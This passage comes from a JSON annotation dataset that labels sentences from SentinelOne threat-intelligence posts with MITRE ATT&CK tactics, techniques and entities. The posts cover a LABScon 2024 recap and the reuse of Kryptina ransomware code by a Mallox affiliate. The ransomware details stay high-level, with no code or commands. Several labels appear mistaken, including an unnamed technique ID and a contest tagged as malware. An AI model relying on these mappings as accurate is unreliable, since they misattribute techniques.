advanced persistent threats (APTs).", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-70_SentinelOne_report-p1-s10-c43dcd", "source": "sentinel", "doc_id": "70_SentinelOne_report", "page_number": 1, "sentence_id": 10, "context_before": "He outlined the so-called “ransomware paradox,” which highlights how ransomware groups are differentiating themselves from traditional advanced persistent threats (APTs).", "sentence_text": "They can build up their brand.”", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-70_SentinelOne_report-p1-s11-2c0dd0", "source": "sentinel", "doc_id": "70_SentinelOne_report", "page_number": 1, "sentence_id": 11, "context_before": "They can build up their brand.”", "sentence_text": "CTI and the media shape ransomware groups’ reputation and branding.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-70_SentinelOne_report-p1-s12-5bb8fb", "source": "sentinel", "doc_id": "70_SentinelOne_report", "page_number": 1, "sentence_id": 12, "context_before": "CTI and the media shape ransomware groups’ reputation and branding.", "sentence_text": "A shift in policy is needed, including a reporting code of ethics for CTI and media.”", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-70_SentinelOne_report-p1-s13-851ee5", "source": "sentinel", "doc_id": "70_SentinelOne_report", "page_number": 1, "sentence_id": 13, "context_before": "A shift in policy is needed, including a reporting code of ethics for CTI and media.”", "sentence_text": "Max also zeroed in on the need for a cultural shift within the cybersecurity community – one that advocates for a code of ethics specifically concerning the reporting of ransomware incidents.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-70_SentinelOne_report-p1-s14-3c402a", "source": "sentinel", "doc_id": "70_SentinelOne_report", "page_number": 1, "sentence_id": 14, "context_before": "Max also zeroed in on the need for a cultural shift within the cybersecurity community – one that advocates for a code of ethics specifically concerning the reporting of ransomware incidents.", "sentence_text": "This talk calls for the defense community to continue working together to stop ransomware groups from exploiting our attention for their own personal (and criminal) gains.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-70_SentinelOne_report-p1-s15-f3043d", "source": "sentinel", "doc_id": "70_SentinelOne_report", "page_number": 1, "sentence_id": 15, "context_before": "This talk calls for the defense community to continue working together to stop ransomware groups from exploiting our attention for their own personal (and criminal) gains.", "sentence_text": "Max Smeets on the ransomware trust paradox #LABScon24 @Maxwsmeets pic.twitter.com/IgqMD4oBpw — LABScon (@labscon_io)\nSeptember 19, 2024 Real Talks in Real-Time | Opening Up the Discourse on Today’s Cybersecurity Hot Topics At LABScon24, we proudly delivered on what’s most important: setting the stage for the community’s best and brightest to give real talks in real-time.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-70_SentinelOne_report-p1-s16-f15754", "source": "sentinel", "doc_id": "70_SentinelOne_report", "page_number": 1, "sentence_id": 16, "context_before": "Max Smeets on the ransomware trust paradox #LABScon24 @Maxwsmeets pic.twitter.com/IgqMD4oBpw — LABScon (@labscon_io)\nSeptember 19, 2024 Real Talks in Real-Time | Opening Up the Discourse on Today’s Cybersecurity Hot Topics At LABScon24, we proudly delivered on what’s most important: setting the stage for the community’s best and brightest to give real talks in real-time.", "sentence_text": "These insights can help strengthen threat intelligence efforts focused on individuals and groups within China.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-70_SentinelOne_report-p1-s17-551767", "source": "sentinel", "doc_id": "70_SentinelOne_report", "page_number": 1, "sentence_id": 17, "context_before": "These insights can help strengthen threat intelligence efforts focused on individuals and groups within China.", "sentence_text": "Eugenio and Dakota honed in on CTF competitions at universities.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-70_SentinelOne_report-p1-s18-73abd7", "source": "sentinel", "doc_id": "70_SentinelOne_report", "page_number": 1, "sentence_id": 18, "context_before": "Eugenio and Dakota honed in on CTF competitions at universities.", "sentence_text": "Their talk concluded by detailing two Chinese hacking competitions with no write ups – one of which may have had student participants attack a real target.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-70_SentinelOne_report-p1-s19-86e0c0", "source": "sentinel", "doc_id": "70_SentinelOne_report", "page_number": 1, "sentence_id": 19, "context_before": "Their talk concluded by detailing two Chinese hacking competitions with no write ups – one of which may have had student participants attack a real target.", "sentence_text": "You can read more about the Zhujian Cup in this WIRED article.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-70_SentinelOne_report-p1-s20-d832e5", "source": "sentinel", "doc_id": "70_SentinelOne_report", "page_number": 1, "sentence_id": 20, "context_before": "You can read more about the Zhujian Cup in this WIRED article.", "sentence_text": "It’s New Year’s Eve ‘23: while you were celebrating, a Chinese university likely used a student hacking contest to conduct cyber ops vs. an unknown target.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" }, { "id": "T1584", "name": "Compromise Infrastructure" } ], "procedure": "conduct cyber ops vs. an unknown target", "entities": [ { "text": "Chinese university", "start": 55, "end": 73, "label": "ThreatActor" }, { "text": "student hacking contest", "start": 88, "end": 111, "label": "MalwareTool" }, { "text": "conduct cyber ops vs. an unknown target.", "start": 115, "end": 155, "label": "Action" } ] }, { "uid": "sentinel-70_SentinelOne_report-p1-s21-ded7db", "source": "sentinel", "doc_id": "70_SentinelOne_report", "page_number": 1, "sentence_id": 21, "context_before": "It’s New Year’s Eve ‘23: while you were celebrating, a Chinese university likely used a student hacking contest to conduct cyber ops vs. an unknown target.", "sentence_text": "More at\n#LABScon2024\n.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-70_SentinelOne_report-p1-s22-3a29b7", "source": "sentinel", "doc_id": "70_SentinelOne_report", "page_number": 1, "sentence_id": 22, "context_before": "More at\n#LABScon2024\n.", "sentence_text": "Their findings revealed how default test keys shipped by vendors could expose systems to significant threats.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" }, { "id": "T1524", "name": "" } ], "procedure": "expose systems to significant threats", "entities": [ { "text": "default test keys", "start": 28, "end": 45, "label": "Infrastructure_Indicator" }, { "text": "expose systems to significant threats.", "start": 71, "end": 109, "label": "Action" } ] }, { "uid": "sentinel-70_SentinelOne_report-p1-s23-cdcaf1", "source": "sentinel", "doc_id": "70_SentinelOne_report", "page_number": 1, "sentence_id": 23, "context_before": "Their findings revealed how default test keys shipped by vendors could expose systems to significant threats.", "sentence_text": "Binarly researchers Alex Matrosov and Fabio Pagani with some fresh details on the PKfail supply chain exposure @binarly_io @matrosov @pagabuc pic.twitter.com/iE1lY64zie — LABScon (@labscon_io)\nSeptember 19, 2024 SentinelLabs’ Jim Walter (Senior Threat Researcher) examined recent developments in the Kryptina platform, exploring why it appeals to threat actors and its implications for victims and targeting.", "relevant": "yes", "tactic": [ { "id": "TA0043", "name": "Reconnaissance" } ], "techniques": [ { "id": "T1598", "name": "Phishing for Information" } ], "procedure": "targeting", "entities": [ { "text": " threat actors", "start": 346, "end": 360, "label": "ThreatActor" }, { "text": "Kryptina platform", "start": 300, "end": 317, "label": "MalwareTool" }, { "text": " PKfail supply chain exposure", "start": 81, "end": 110, "label": "Infrastructure_Indicator" }, { "text": "targeting", "start": 398, "end": 407, "label": "Action" } ] }, { "uid": "sentinel-70_SentinelOne_report-p1-s24-ae6fc0", "source": "sentinel", "doc_id": "70_SentinelOne_report", "page_number": 1, "sentence_id": 24, "context_before": "Binarly researchers Alex Matrosov and Fabio Pagani with some fresh details on the PKfail supply chain exposure @binarly_io @matrosov @pagabuc pic.twitter.com/iE1lY64zie — LABScon (@labscon_io)\nSeptember 19, 2024 SentinelLabs’ Jim Walter (Senior Threat Researcher) examined recent developments in the Kryptina platform, exploring why it appeals to threat actors and its implications for victims and targeting.", "sentence_text": "Jim also laid out his analysis on the May 2024 Mallox leak, which focused on the modifications and improvements made by current threat actors.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1587", "name": "Develop Capabilities" } ], "procedure": "modifications and improvements", "entities": [ { "text": "current threat actors.", "start": 120, "end": 142, "label": "ThreatActor" }, { "text": "Mallox leak", "start": 47, "end": 58, "label": "MalwareTool" }, { "text": "modifications and improvements ", "start": 81, "end": 112, "label": "Action" } ] }, { "uid": "sentinel-70_SentinelOne_report-p1-s25-7d461e", "source": "sentinel", "doc_id": "70_SentinelOne_report", "page_number": 1, "sentence_id": 25, "context_before": "Jim also laid out his analysis on the May 2024 Mallox leak, which focused on the modifications and improvements made by current threat actors.", "sentence_text": "A full blog post deep diving into this topic is available here Saw this preso from Jim Walter on the @LabsSentinel team at @labscon_io .", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-70_SentinelOne_report-p1-s26-6ae8ea", "source": "sentinel", "doc_id": "70_SentinelOne_report", "page_number": 1, "sentence_id": 26, "context_before": "A full blog post deep diving into this topic is available here Saw this preso from Jim Walter on the @LabsSentinel team at @labscon_io .", "sentence_text": "Wild to see basically a straight cut/copy on the RaaS side.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-70_SentinelOne_report-p1-s27-de3977", "source": "sentinel", "doc_id": "70_SentinelOne_report", "page_number": 1, "sentence_id": 27, "context_before": "Wild to see basically a straight cut/copy on the RaaS side.", "sentence_text": "— Steve Stone (@stonepwn3000)\nSeptember 23, 2024 Event Specials | It’s About Building Community LABScon is not just about research; it emphasizes the importance of community when it comes down to the hard work of combating cyber threats.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-70_SentinelOne_report-p1-s28-b8cbee", "source": "sentinel", "doc_id": "70_SentinelOne_report", "page_number": 1, "sentence_id": 28, "context_before": "— Steve Stone (@stonepwn3000)\nSeptember 23, 2024 Event Specials | It’s About Building Community LABScon is not just about research; it emphasizes the importance of community when it comes down to the hard work of combating cyber threats.", "sentence_text": "#LABScon24 @labscon_io pic.twitter.com/70IbXRTkSL — Elly Rostoum (@EllyRostoum)\nSeptember 26, 2024 As part of such a tight-knit group of defenders, it’s important to take a few moments to recognize the constant and remarkable efforts dedicated to applying fresh outlooks and solutions while tackling complex problems.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-70_SentinelOne_report-p1-s29-251336", "source": "sentinel", "doc_id": "70_SentinelOne_report", "page_number": 1, "sentence_id": 29, "context_before": "#LABScon24 @labscon_io pic.twitter.com/70IbXRTkSL — Elly Rostoum (@EllyRostoum)\nSeptember 26, 2024 As part of such a tight-knit group of defenders, it’s important to take a few moments to recognize the constant and remarkable efforts dedicated to applying fresh outlooks and solutions while tackling complex problems.", "sentence_text": "SentinelLabs was honored to present Dr. Cristina Cifuentes (Vice President of Oracle’s Software Assurance organization) with a Lifetime Achievement Award for leading the charge in solving big issues in the Software Assurance industry.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-70_SentinelOne_report-p1-s30-1135b4", "source": "sentinel", "doc_id": "70_SentinelOne_report", "page_number": 1, "sentence_id": 30, "context_before": "SentinelLabs was honored to present Dr. Cristina Cifuentes (Vice President of Oracle’s Software Assurance organization) with a Lifetime Achievement Award for leading the charge in solving big issues in the Software Assurance industry.", "sentence_text": "Cristina’s passion for tackling the big issues in the field of Program Analysis began with her doctoral work in binary decompilation at the Queensland University of Technology, which led to her being named the Mother of Decompilation for her contributions to this domain.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-70_SentinelOne_report-p1-s31-0a0125", "source": "sentinel", "doc_id": "70_SentinelOne_report", "page_number": 1, "sentence_id": 31, "context_before": "Cristina’s passion for tackling the big issues in the field of Program Analysis began with her doctoral work in binary decompilation at the Queensland University of Technology, which led to her being named the Mother of Decompilation for her contributions to this domain.", "sentence_text": "pic.twitter.com/Y0qTjliRPh\n— LABScon (@labscon_io)\nSeptember 19, 2024 And what’s a three-day event without a little (read: a lot) of fun?", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-70_SentinelOne_report-p1-s32-c5c0ac", "source": "sentinel", "doc_id": "70_SentinelOne_report", "page_number": 1, "sentence_id": 32, "context_before": "pic.twitter.com/Y0qTjliRPh\n— LABScon (@labscon_io)\nSeptember 19, 2024 And what’s a three-day event without a little (read: a lot) of fun?", "sentence_text": "@labscon_io\nwas a blast!", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-70_SentinelOne_report-p1-s33-f7cee7", "source": "sentinel", "doc_id": "70_SentinelOne_report", "page_number": 1, "sentence_id": 33, "context_before": "@labscon_io\nwas a blast!", "sentence_text": "And the\n@dreadnode\nteam represented!", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-70_SentinelOne_report-p1-s34-82dce5", "source": "sentinel", "doc_id": "70_SentinelOne_report", "page_number": 1, "sentence_id": 34, "context_before": "And the\n@dreadnode\nteam represented!", "sentence_text": "#labscon\npic.twitter.com/j9s567Al4t\n— Rob (@Rob_Mulla)\nSeptember 21, 2024 Looking Ahead to 2025 Now that LABScon 2024 is all wrapped up, we’re already looking forward to what next year has in store.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-70_SentinelOne_report-p1-s35-cb95aa", "source": "sentinel", "doc_id": "70_SentinelOne_report", "page_number": 1, "sentence_id": 35, "context_before": "#labscon\npic.twitter.com/j9s567Al4t\n— Rob (@Rob_Mulla)\nSeptember 21, 2024 Looking Ahead to 2025 Now that LABScon 2024 is all wrapped up, we’re already looking forward to what next year has in store.", "sentence_text": "We’d also like to say a sincere thank you to all of the amazing folks who came together to make this event the success that it is.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-70_SentinelOne_report-p1-s36-c681f1", "source": "sentinel", "doc_id": "70_SentinelOne_report", "page_number": 1, "sentence_id": 36, "context_before": "We’d also like to say a sincere thank you to all of the amazing folks who came together to make this event the success that it is.", "sentence_text": "Stay connected\nwith us as we start releasing more insightful presentations from the event and give updates on upcoming talks.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-70_SentinelOne_report-p1-s37-5fa9a4", "source": "sentinel", "doc_id": "70_SentinelOne_report", "page_number": 1, "sentence_id": 37, "context_before": "Stay connected\nwith us as we start releasing more insightful presentations from the event and give updates on upcoming talks.", "sentence_text": "\n>\nLike this article?", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-70_SentinelOne_report-p1-s38-f6937e", "source": "sentinel", "doc_id": "70_SentinelOne_report", "page_number": 1, "sentence_id": 38, "context_before": "\n>\nLike this article?", "sentence_text": "Get Demo\nSentinelLabs\nSentinelLabs: Threat Intel & Malware Analysis", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-70_SentinelOne_report-p1-s39-33bec9", "source": "sentinel", "doc_id": "70_SentinelOne_report", "page_number": 1, "sentence_id": 39, "context_before": "Get Demo\nSentinelLabs\nSentinelLabs: Threat Intel & Malware Analysis", "sentence_text": "We are hunters, reversers, exploit developers, & tinkerers shedding light on the vast world of malware, exploits, APTs, & cybercrime across all platforms.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-70_SentinelOne_report-p1-s40-ec0e50", "source": "sentinel", "doc_id": "70_SentinelOne_report", "page_number": 1, "sentence_id": 40, "context_before": "We are hunters, reversers, exploit developers, & tinkerers shedding light on the vast world of malware, exploits, APTs, & cybercrime across all platforms.", "sentence_text": "VISIT SITE", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-71_SentinelOne_report-p1-s1-329c9a", "source": "sentinel", "doc_id": "71_SentinelOne_report", "page_number": 1, "sentence_id": 1, "context_before": "", "sentence_text": "The affiliate made superficial changes to source code and documentation, stripping Kryptina branding but retaining core functionality.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1587", "name": "Develop Capabilities" } ], "procedure": "made superficial changes to source code and documentation", "entities": [ { "text": "The affiliate", "start": 0, "end": 13, "label": "ThreatActor" }, { "text": "Kryptina", "start": 83, "end": 91, "label": "MalwareTool" }, { "text": " made superficial changes to source code and documentation", "start": 13, "end": 71, "label": "Action" } ] }, { "uid": "sentinel-71_SentinelOne_report-p1-s2-fd8d54", "source": "sentinel", "doc_id": "71_SentinelOne_report", "page_number": 1, "sentence_id": 2, "context_before": "The affiliate made superficial changes to source code and documentation, stripping Kryptina branding but retaining core functionality.", "sentence_text": "The adoption of Kryptina by Mallox affiliates exemplifies the commoditization of ransomware tools, complicating malware tracking as affiliates blend different codebases into new variants.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": null, "procedure": "Mallox affiliates adopt Kryptina and blend different codebases into new ransomware variants.", "entities": [ { "text": "Kryptina", "start": 16, "end": 24, "label": "MalwareTool" }, { "text": "Mallox affiliates", "start": 28, "end": 45, "label": "ThreatActor" }, { "text": "adoption of Kryptina", "start": 4, "end": 24, "label": "Action" }, { "text": "blend different codebases", "start": 143, "end": 168, "label": "Action" } ] }, { "uid": "sentinel-71_SentinelOne_report-p1-s3-8736bc", "source": "sentinel", "doc_id": "71_SentinelOne_report", "page_number": 1, "sentence_id": 3, "context_before": "The adoption of Kryptina by Mallox affiliates exemplifies the commoditization of ransomware tools, complicating malware tracking as affiliates blend different codebases into new variants.", "sentence_text": "This original research was presented by the author at LABScon 2024 in Scottsdale, Arizona.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-71_SentinelOne_report-p1-s4-69bffb", "source": "sentinel", "doc_id": "71_SentinelOne_report", "page_number": 1, "sentence_id": 4, "context_before": "This original research was presented by the author at LABScon 2024 in Scottsdale, Arizona.", "sentence_text": "At the time, Kryptina provided all the components required to host a fully functional RaaS platform.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-71_SentinelOne_report-p1-s5-063860", "source": "sentinel", "doc_id": "71_SentinelOne_report", "page_number": 1, "sentence_id": 5, "context_before": "At the time, Kryptina provided all the components required to host a fully functional RaaS platform.", "sentence_text": "Despite such functionality, the offering struggled to attract much interest from dark market customers.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-71_SentinelOne_report-p1-s6-7a27ba", "source": "sentinel", "doc_id": "71_SentinelOne_report", "page_number": 1, "sentence_id": 6, "context_before": "Despite such functionality, the offering struggled to attract much interest from dark market customers.", "sentence_text": "In May 2024, an affiliate of the Mallox RaaS exposed one of their staging servers.", "relevant": "yes", "tactic": [ { "id": "TA0043", "name": "Reconnaissance" } ], "techniques": null, "procedure": "An affiliate exposed one of their staging servers.", "entities": [ { "text": "affiliate of the Mallox RaaS", "start": 16, "end": 44, "label": "ThreatActor" }, { "text": "exposed one of their staging servers", "start": 45, "end": 81, "label": "Action" }, { "text": "staging servers", "start": 66, "end": 81, "label": "Infrastructure_Indicator" } ] }, { "uid": "sentinel-71_SentinelOne_report-p1-s7-a6d0b7", "source": "sentinel", "doc_id": "71_SentinelOne_report", "page_number": 1, "sentence_id": 7, "context_before": "In May 2024, an affiliate of the Mallox RaaS exposed one of their staging servers.", "sentence_text": "As a result of this leak, we identified Kryptina RaaS to be the platform on which the affiliate’s Linux variants were based.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-71_SentinelOne_report-p1-s8-424f37", "source": "sentinel", "doc_id": "71_SentinelOne_report", "page_number": 1, "sentence_id": 8, "context_before": "As a result of this leak, we identified Kryptina RaaS to be the platform on which the affiliate’s Linux variants were based.", "sentence_text": "The affiliate threat actor referred to this Linux variant as “Mallox v1.0”.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-71_SentinelOne_report-p1-s9-879f7d", "source": "sentinel", "doc_id": "71_SentinelOne_report", "page_number": 1, "sentence_id": 9, "context_before": "The affiliate threat actor referred to this Linux variant as “Mallox v1.0”.", "sentence_text": "This ‘evolution’ of Kryptina is notable in a rags-to-riches sort of way.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-71_SentinelOne_report-p1-s10-bf44a9", "source": "sentinel", "doc_id": "71_SentinelOne_report", "page_number": 1, "sentence_id": 10, "context_before": "This ‘evolution’ of Kryptina is notable in a rags-to-riches sort of way.", "sentence_text": "In the span of a few months, the tool went from an unsellable give-away in public forums to being observed in active SMB/Enterprise attacks.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-71_SentinelOne_report-p1-s11-8cf880", "source": "sentinel", "doc_id": "71_SentinelOne_report", "page_number": 1, "sentence_id": 11, "context_before": "In the span of a few months, the tool went from an unsellable give-away in public forums to being observed in active SMB/Enterprise attacks.", "sentence_text": "Brief History of Kryptina & Mallox Mallox ( aka TargetCompany )", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-71_SentinelOne_report-p1-s12-80ae91", "source": "sentinel", "doc_id": "71_SentinelOne_report", "page_number": 1, "sentence_id": 12, "context_before": "Brief History of Kryptina & Mallox Mallox ( aka TargetCompany )", "sentence_text": "Mallox operators are known to opportunistically target ‘timely’ vulnerabilities (e.g., MSSQL Server ).", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "Mallox operators target timely MSSQL Server vulnerabilities", "entities": [ { "text": "Mallox operators", "start": 0, "end": 16, "label": "ThreatActor" }, { "text": "MSSQL Server", "start": 87, "end": 99, "label": "Infrastructure_Indicator" }, { "text": "opportunistically target ‘timely’ vulnerabilities", "start": 30, "end": 79, "label": "Action" } ] }, { "uid": "sentinel-71_SentinelOne_report-p1-s13-ef4ee5", "source": "sentinel", "doc_id": "71_SentinelOne_report", "page_number": 1, "sentence_id": 13, "context_before": "Mallox operators are known to opportunistically target ‘timely’ vulnerabilities (e.g., MSSQL Server ).", "sentence_text": "Individual affiliate behavior will vary, though this style of exploitation, along with brute force attacks to establish initial access, is common across Mallox campaigns.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" }, { "id": "T1110", "name": "Brute Force" } ], "procedure": "exploitation and brute force attacks to establish initial access", "entities": [ { "text": "Mallox", "start": 153, "end": 159, "label": "ThreatActor" }, { "text": "brute force attacks to establish initial access", "start": 87, "end": 134, "label": "Action" }, { "text": "exploitation", "start": 62, "end": 74, "label": "Action" } ] }, { "uid": "sentinel-71_SentinelOne_report-p1-s14-f8eb8c", "source": "sentinel", "doc_id": "71_SentinelOne_report", "page_number": 1, "sentence_id": 14, "context_before": "Individual affiliate behavior will vary, though this style of exploitation, along with brute force attacks to establish initial access, is common across Mallox campaigns.", "sentence_text": "Kryptina was first offered for sale by the “Corlys” identity in December 2023.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1587", "name": "Develop Capabilities" }, { "id": "T1588", "name": "Obtain Capabilities" } ], "procedure": "offered Kryptina for sale", "entities": [ { "text": "Corlys", "start": 44, "end": 50, "label": "ThreatActor" }, { "text": "offered for sale", "start": 19, "end": 35, "label": "Action" } ] }, { "uid": "sentinel-71_SentinelOne_report-p1-s15-467fd2", "source": "sentinel", "doc_id": "71_SentinelOne_report", "page_number": 1, "sentence_id": 15, "context_before": "Kryptina was first offered for sale by the “Corlys” identity in December 2023.", "sentence_text": "This staging server was erected by a Mallox affiliate and hosts a number of attacker-related tools.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1583", "name": "Acquire Infrastructure" } ], "procedure": "erected a staging server hosting attacker tools", "entities": [ { "text": "Mallox affiliate", "start": 37, "end": 53, "label": "ThreatActor" }, { "text": "attacker-related tools.", "start": 76, "end": 99, "label": "MalwareTool" }, { "text": " staging server", "start": 4, "end": 19, "label": "Infrastructure_Indicator" }, { "text": " erected", "start": 23, "end": 31, "label": "Action" }, { "text": "hosts a number of attacker-related tools.", "start": 58, "end": 99, "label": "Action" } ] }, { "uid": "sentinel-71_SentinelOne_report-p1-s16-f73ad0", "source": "sentinel", "doc_id": "71_SentinelOne_report", "page_number": 1, "sentence_id": 16, "context_before": "This staging server was erected by a Mallox affiliate and hosts a number of attacker-related tools.", "sentence_text": "The use of Kryptina by this affiliate appears to be singular:\nother\nLinux variants of Mallox are not based on Kryptina, further complicating the the relationship between Kryptina and Mallox.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-71_SentinelOne_report-p1-s17-5b4545", "source": "sentinel", "doc_id": "71_SentinelOne_report", "page_number": 1, "sentence_id": 17, "context_before": "The use of Kryptina by this affiliate appears to be singular:\nother\nLinux variants of Mallox are not based on Kryptina, further complicating the the relationship between Kryptina and Mallox.", "sentence_text": "Customizing Kryptina\nEncryption and decryption routines in “Mallox Linux 1.0” are identical to original Kryptina.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1486", "name": "Data Encrypted for Impact" } ], "procedure": "uses Kryptina’s original encryption/decryption routines", "entities": [ { "text": "Kryptina", "start": 12, "end": 20, "label": "MalwareTool" }, { "text": "Mallox Linux 1.0", "start": 60, "end": 76, "label": "MalwareTool" }, { "text": "identical to original Kryptina.", "start": 82, "end": 113, "label": "Action" } ] }, { "uid": "sentinel-71_SentinelOne_report-p1-s18-fdbe70", "source": "sentinel", "doc_id": "71_SentinelOne_report", "page_number": 1, "sentence_id": 18, "context_before": "Customizing Kryptina\nEncryption and decryption routines in “Mallox Linux 1.0” are identical to original Kryptina.", "sentence_text": "To recap from our previous write-up :\n“Individual file encryption is achieved through use of AES256 in CBC mode.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1486", "name": "Data Encrypted for Impact" } ], "procedure": "encrypts individual files using AES256 in CBC mode", "entities": [ { "text": "file encryption is achieved through use of AES256 in CBC mode.", "start": 50, "end": 112, "label": "Action" } ] }, { "uid": "sentinel-71_SentinelOne_report-p1-s19-3756d8", "source": "sentinel", "doc_id": "71_SentinelOne_report", "page_number": 1, "sentence_id": 19, "context_before": "To recap from our previous write-up :\n“Individual file encryption is achieved through use of AES256 in CBC mode.", "sentence_text": "The keys and configuration data are obfuscated via XOR and then base64 encoded (the XOR key depends on the value set in the builder or scripts).", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1027", "name": "Obfuscated Files or Information" } ], "procedure": "obfuscates keys and configuration via XOR and base64 encoding", "entities": [ { "text": "obfuscated via XOR and then base64 encoded ", "start": 36, "end": 79, "label": "Action" } ] }, { "uid": "sentinel-71_SentinelOne_report-p1-s20-7364a7", "source": "sentinel", "doc_id": "71_SentinelOne_report", "page_number": 1, "sentence_id": 20, "context_before": "The keys and configuration data are obfuscated via XOR and then base64 encoded (the XOR key depends on the value set in the builder or scripts).", "sentence_text": "The function krptna_process_file()\nfunction is responsible for the file encryption.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1486", "name": "Data Encrypted for Impact" } ], "procedure": "responsible for file encryption", "entities": [ { "text": " krptna_process_file()", "start": 12, "end": 34, "label": "MalwareTool" }, { "text": " file encryption.", "start": 66, "end": 83, "label": "Action" } ] }, { "uid": "sentinel-71_SentinelOne_report-p1-s21-63ac67", "source": "sentinel", "doc_id": "71_SentinelOne_report", "page_number": 1, "sentence_id": 21, "context_before": "The function krptna_process_file()\nfunction is responsible for the file encryption.", "sentence_text": "This function is a typical implementation of file encryption/decryption using the AES-256-CBC algorithm in OpenSSL.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-71_SentinelOne_report-p1-s22-5200f4", "source": "sentinel", "doc_id": "71_SentinelOne_report", "page_number": 1, "sentence_id": 22, "context_before": "This function is a typical implementation of file encryption/decryption using the AES-256-CBC algorithm in OpenSSL.", "sentence_text": "This function initializes an OpenSSL cipher context EVP_CIPHER_CTX_new()\n.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-71_SentinelOne_report-p1-s23-c71e8d", "source": "sentinel", "doc_id": "71_SentinelOne_report", "page_number": 1, "sentence_id": 23, "context_before": "This function initializes an OpenSSL cipher context EVP_CIPHER_CTX_new()\n.", "sentence_text": "File input and output streams are processed via EVP_CipherUpdate()\n, which transforms unencrypted file data to the encrypted data in the output buffer.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1486", "name": "Data Encrypted for Impact" } ], "procedure": "Encrypts file data using OpenSSL EVP_CipherUpdate()", "entities": [ { "text": " streams are processed via EVP_CipherUpdate()", "start": 21, "end": 66, "label": "Action" } ] }, { "uid": "sentinel-71_SentinelOne_report-p1-s24-ef769f", "source": "sentinel", "doc_id": "71_SentinelOne_report", "page_number": 1, "sentence_id": 24, "context_before": "File input and output streams are processed via EVP_CipherUpdate()\n, which transforms unencrypted file data to the encrypted data in the output buffer.", 